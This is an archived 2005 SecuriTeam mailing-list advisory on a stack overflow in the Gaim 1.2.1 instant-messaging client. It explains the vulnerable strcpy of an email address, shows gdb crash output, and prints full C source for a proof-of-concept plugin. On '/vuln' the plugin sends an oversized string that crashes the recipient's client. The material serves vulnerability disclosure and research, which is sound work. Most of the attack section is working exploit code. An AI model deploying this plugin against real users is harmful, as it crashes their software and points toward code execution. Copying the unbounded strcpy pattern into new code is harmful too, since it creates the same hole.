[EXPL] Gaim Stack Overflow (PoC)
From: SecuriTeam (support_at_securiteam.com)
Date: 05/15/05
- Previous message: SecuriTeam: "[EXPL] Ethereal SIP Dissector Overflow (Exploit 2)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 15 May 2005 19:02:26 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Gaim Stack Overflow (PoC)
------------------------------------------------------------------------
SUMMARY
" <http://gaim.sourceforge.net/> Gaim is a multi-protocol instant
messaging (IM) client for Linux, BSD, MacOS X, and Windows. It is
compatible with AIM and ICQ (Oscar protocol), MSN Messenger, Yahoo!, IRC,
Jabber, Gadu-Gadu, SILC, GroupWise Messenger, and Zephyr networks."
A stack overflow vulnerability exists in Gaim, exploiting this
vulnerability can lead to denial of service or, potentially, arbitrary
code execution.
DETAILS
Vulnerable Systems:
* Gaim version 1.2.1
Ron was looking at the stack overflow reported in Gaim 1.2.1. It's was
actually pretty trivial to find. The line that contains it looks like
this:
strcpy(url_buf, gurl_buf->str);
url_buf is a 8192-byte buffer, and gurl_buf->str is an email address that
is being displayed (user controlled).
The difficulty in writing a real exploit is that the input is sanitized,
so any character over 128, as well as ' ', ',', '\n', '<', and others are
stripped away. This doesn't leave much to play with, although it would be
possible to write an exploit under these conditions.
Another difficulty is that most chat protocols limit you to a reasonable
message size, and 8192 is typically well above that size. So even if you
could successfully create an exploit, you would still have to do it on a
chat protocol that allows very long messages. The final difficulty is that
you also process the URL locally, when you send it, but that's not really
a big deal. It would be trivial to filter it out in a plugin to make sure
you don't crash yourself.
For this example, Ron just threw together a quick plugin (based on an old
plugin He wrote, which is why it's such a mess) which sends a
10002-character email address when the user types "/vuln". Gaim crashes at
the address 0x41414141.
(gdb) run
Starting program: /usr/local/bin/gaim
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 24908)]
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 24908)]
0x41414141 in ?? ()
Proof of Concept:
// Written by Ron <iago@valhallalegends.com>
// Friday, May 13, 2005
//
// This is a very weak demonstration of Gaim 1.2.1's stack overflow
vulnerability
// when processing email addresses. What this basically does is segfault
you when you
// do a /vuln command in a conversation, and, if you're using a protocol
that allows
// a 10002-character message to go through, also segfaults the person you
sent it to.
// The reason is that gaim's stack is overwritten with a whole bunch of
'A's, and
// the return address of the function ends up at 0x41414141. That's no
good for
// anybody.
//
// This code should be considered public domain, and is freely
modifiable/distributable
// by any and everyone.
//
// Note:
// To compile, place this in the "plugins" directory of Gaim's source
// (gaim-1.2.1/plugins) and type "make vuln-plugin.so". This will compile
vuln-plugin.so.
// Then put it in ~/.gaim/plugins, restart gaim, and load it as a plugin.
#include <unistd.h>
#include <ctype.h>
#include <string.h>
#include <locale.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "internal.h"
#include "gtkgaim.h"
#include "debug.h"
#include "signals.h"
#include "util.h"
#include "version.h"
#include "cmds.h"
#include "conversation.h"
#include "gtkplugin.h"
#include "gtkutils.h"
#define ME "1.2.1 Vuln Check"
#define MAXLENGTH 1024
#define XMMS_PLUGIN_VERSION "I am a test plugin to check for URL encoding
vulnerability."
static GaimCmdId cmd;
char *code = "A@AAAA...(A*8192)...AAAAA";
gboolean go(GaimConversation *conv, const gchar *cmd, gchar **args, gchar
**error, void *data)
{
gaim_conv_im_send(GAIM_CONV_IM(conv), code);
return GAIM_CMD_STATUS_OK;
}
static gboolean plugin_load(GaimPlugin *plugin)
{
cmd = gaim_cmd_register("vuln", "", GAIM_CMD_P_DEFAULT, GAIM_CMD_FLAG_IM,
NULL, (GaimCmdFunc)go, "/vuln", NULL);
return TRUE;
}
static gboolean plugin_unload(GaimPlugin *plugin)
{
gaim_cmd_unregister (cmd);
return TRUE;
}
static GaimPluginInfo info =
{
GAIM_PLUGIN_MAGIC,
GAIM_MAJOR_VERSION,
GAIM_MINOR_VERSION,
GAIM_PLUGIN_STANDARD, /**< type */
NULL, /**< ui_requirement */
0, /**< flags */
NULL, /**< dependencies */
GAIM_PRIORITY_DEFAULT, /**< priority */
NULL, /**< id */
N_("1.2.1 Email Overflow Demo"), /**< name */
VERSION, /**< version */
/** summary */
N_(""),
/** description */
N_(""),
"Ron <iago@valhallalegends.com>", /**< author */
"", /**< homepage */
plugin_load, /**< load */
plugin_unload, /**< unload */
NULL, /**< destroy */
NULL, /**< ui_info */
NULL, /**< extra_info */
NULL,
NULL
};
static void init_plugin(GaimPlugin *plugin)
{
}
GAIM_INIT_PLUGIN(XMMSPlugin, init_plugin, info)
ADDITIONAL INFORMATION
The information has been provided by <mailto:iago@valhallalegends.com>
Ron.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[EXPL] Ethereal SIP Dissector Overflow (Exploit 2)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
